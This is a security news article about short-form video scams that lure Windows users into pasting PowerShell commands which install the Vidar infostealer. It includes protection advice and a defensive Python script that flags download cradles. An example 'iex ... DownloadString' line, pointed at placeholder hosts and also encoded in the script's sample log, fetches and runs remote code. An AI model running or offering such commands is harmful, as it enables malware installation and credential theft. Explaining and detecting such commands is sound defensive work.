A wave of coordinated scam campaigns across TikTok and Instagram Reels is luring Windows users with promises of free Microsoft Office, Windows activation, and premium software, only to silently deploy the Vidar infostealer via malicious PowerShell commands. Security researchers flagged the activity on June 11, 2026, warning that the short-form video scams have already compromised an unknown number of systems worldwide.
These campaigns mark a worrying evolution in social engineering, weaponizing trusted social platforms and legitimate system tools to bypass traditional security defenses. Videos typically feature a friendly face walking through a supposed activation hack or cracked software installation, encouraging viewers to copy and paste a seemingly harmless command into PowerShell running with administrator privileges. The result is a silent data theft that can strip a victim’s entire digital identity in minutes.
The Anatomy of the Scam
The attackers create polished, authentic-looking Reels that promise free access to expensive software. Popular lures include fake activators for Microsoft Office and Windows, “free premium” Spotify accounts, and full Adobe Creative Suite downloads. The videos exploit the short-form format’s inherent trust: a person on screen demonstrates the steps, adding a veneer of legitimacy that text‑based phishing attacks lack.
When a viewer follows the instructions, they are told to open PowerShell as an administrator and paste a specific string of code. The command is often obfuscated with comments or broken into segments to sidestep platform content filters. Once executed, the script silently reaches out to a remote server, downloads a payload, and executes it—all hidden within seconds. The video then directs the user to a fake download page that either does nothing or installs a benign‑looking decoy to mask the infection.
PowerShell: The Downloader in Plain Sight
PowerShell is a powerful scripting language built into Windows, essential for system administration and automation. Cybercriminals have long abused it because it is trusted, rarely blocked, and can execute code directly in memory without writing files to disk. The commands used in this campaign follow a familiar pattern:
- Invoke-Expression (or its alias iex) runs a string as code.
- New-Object System.Net.WebClient fetches a malicious script from a server.
- Base64‑encoded payloads hide the true intent from casual inspection and automated scanners.
A typical line might look like:
powershell -Command "iex ((New-Object System.Net.WebClient).DownloadString('hxxp://malicious-domain[.]com/cfg.txt'))"
To a non‑technical user, the command appears cryptic but not inherently dangerous—especially when a charismatic influencer declares it “will just activate Office.” The reality is far more sinister: the downloaded script is often a downloader that fetches and installs Vidar, a commodity infostealer sold on underground forums for as little as $200.
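A defender-side check for the downloader pattern just described, written here as an added example (not code from the original article or from any vendor tool): it scans PowerShell command lines as they would appear in process or script-block logs, decodes any -EncodedCommand argument (PowerShell encodes it as UTF-16LE base64), and flags lines that combine Invoke-Expression/iex with WebClient downloads or base64 decoding. The sample log lines, the example.invalid host and the indicator names are constructed assumptions.

```python
import base64
import re

# Indicators drawn from the chain described above: Invoke-Expression / iex,
# WebClient.DownloadString, and base64 wrapping of the real command.
INDICATORS = {
    "invoke_expression": re.compile(r"\b(invoke-expression|iex)\b", re.I),
    "webclient_download": re.compile(r"net\.webclient|downloadstring|downloadfile", re.I),
    "encoded_command": re.compile(r"-(e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I),
    "base64_decode": re.compile(r"frombase64string", re.I),
}

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (UTF-16LE base64), or None."""
    m = INDICATORS["encoded_command"].search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(2)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def score_command(cmdline):
    """Return (sorted indicator names, decoded payload) for one command line."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline + " " + decoded if decoded else cmdline  # scan decoded text too
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(text))
    return hits, decoded

def triage(log_lines):
    """Keep only lines that match two or more indicators, to cut noise."""
    findings = []
    for line in log_lines:
        hits, decoded = score_command(line)
        if len(hits) >= 2:
            findings.append((line, hits, decoded))
    return findings

# Constructed sample log lines (not real telemetry): a benign admin command,
# the plaintext downloader shape quoted above, and the same chain hidden
# behind -EncodedCommand. The host is a placeholder.
_PAYLOAD = "iex ((New-Object System.Net.WebClient).DownloadString('http://example.invalid/cfg.txt'))"
_ENCODED = base64.b64encode(_PAYLOAD.encode("utf-16-le")).decode()
SAMPLE_LOG = [
    "powershell -Command \"Get-Service | Where-Object Status -eq 'Running'\"",
    'powershell -Command "' + _PAYLOAD + '"',
    "powershell -EncodedCommand " + _ENCODED,
]

if __name__ == "__main__":
    for line, hits, decoded in triage(SAMPLE_LOG):
        print(hits, "| decoded:", decoded or "(plaintext)")
```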
Vidar Infostealer: A Persistent Threat
First documented in 2018, Vidar has evolved into one of the most prolific credential‑stealing malware families. Sold as malware‑as‑a‑service, it lets customers rent the panel and builder to run their own campaigns, making attribution almost impossible. Once on a system, Vidar quickly locates and exfiltrates:
- Saved credentials from browsers (Chrome, Edge, Firefox, and others).
- Cookies and session tokens that bypass multi‑factor authentication.
- Cryptocurrency wallet files and browser extensions (MetaMask, Exodus, etc.).
- Files matching patterns for banking details, saved credit cards, and identity documents.
- Desktop screenshots and basic system information to enrich the stolen data.
The collected information is packed into a zip file and sent to the attacker’s command‑and‑control server. This data often fuels further fraud or identity theft, or is sold on darknet markets to other criminals. In some cases, Vidar serves as an initial access vector for ransomware gangs, who use the stolen credentials to move laterally through corporate networks.
Why Social Media Makes This Campaign Especially Dangerous
TikTok and Instagram Reels are engineered for rapid, immersive consumption, and the platforms’ algorithms push popular content to vast audiences before moderators can react. The scams exploit this speed:
- Trust in video tutorials: Users seeking a quick fix for expensive software are predisposed to follow instructions without skepticism.
- Younger demographic: A significant portion of Reels viewers is under 25, a group that may have less experience recognizing red flags.
- Ephemeral content: Videos can disappear from feeds or be deleted by the uploader after a few hours, making investigation and takedown reactive at best.
- Platform cross‑pollination: A single malicious video can be reposted across dozens of accounts, each with thousands of followers, creating a hydra‑like challenge for security teams.
Combined, these factors lower the bar for successful infection. A study from the cybersecurity firm Sekoia.io found that Vidar‑related campaigns increased 54% in the first quarter of 2026 compared to the previous year, largely driven by social media lure vectors.
Protecting Windows Systems from PowerShell-Based Malware
Microsoft has steadily increased the default security posture of Windows, but user behavior remains the weakest link. Here are concrete steps to guard against infostealer campaigns:
- Never run commands from social media: No legitimate software activation or crack requires you to paste code into PowerShell. Treat any such request as malware.
- Stick to official sources: Download software only from the Microsoft Store, vendor websites, or trusted re‑packagers. Free “activators” are universally malicious.
- Enable controlled folder access and ransomware protection: Built into Windows Defender, these features can block unauthorized changes to sensitive data.
- Use standard user accounts for daily tasks: Running as administrator only when absolutely necessary limits the damage malware can cause.
- Keep Windows and security products updated: Defender signatures are updated multiple times daily and often detect Vidar variants without additional settings.
- Apply PowerShell constrained language mode or execution policies: Enterprises can enforce AllSigned or RemoteSigned policies through Group Policy, restricting the ability to run arbitrary scripts.
Windows 11’s enhanced hardware security requirements—such as TPM 2.0, Secure Boot, and Virtualization‑Based Security—also help isolate malicious code, but no system is immune if the user deliberately overrides protections.
Industry Response and Next Steps
As of June 11, 2026, neither Microsoft nor the major social media platforms had issued formal statements about the ongoing campaigns. Historically, Microsoft has responded to such threats by updating Defender signatures and clarifying official support channels, but the company does not typically comment on individual malware families outside of its Threat Intelligence blog. TikTok and Instagram rely on automated detection and user reports to remove malicious content; users who encounter these videos should report them immediately using the in‑app reporting tools.
This incident reignites the debate around the responsibility of social platforms to police scam content. While both TikTok and Instagram prohibit “illegal or regulated activities,” their moderation systems still struggle with real‑time, technically literate attacks. Some legislators have proposed requiring platforms to run promotion‑based scams through a human review queue, but for now, the onus falls heavily on the user.
A Shifting Threat Landscape
The Vidar‑TikTok campaign illustrates a broader trend: malware distribution is no longer confined to shady downloads or email attachments. Threat actors now meet victims in the digital spaces they already trust, using tools built into the operating system against it. For Windows enthusiasts, this is a stark reminder that curiosity and a deal‑seeking mindset can be weaponized.
The convergence of legitimate platforms, social engineering, and living‑off‑the‑land binaries like PowerShell means defenders must evolve as well. Security awareness training must now cover social media hygiene, not just email. Meanwhile, the security community monitors the situation for new Vidar variants and domain registrations, working to disrupt the infrastructure behind these scams.
Ultimately, the most effective defense is a healthy dose of skepticism: if a stranger on TikTok offers you a free Office license, they’re not a hero—they’re a vector for theft. Stay safe, think twice before you paste, and keep your system’s defenses on high alert.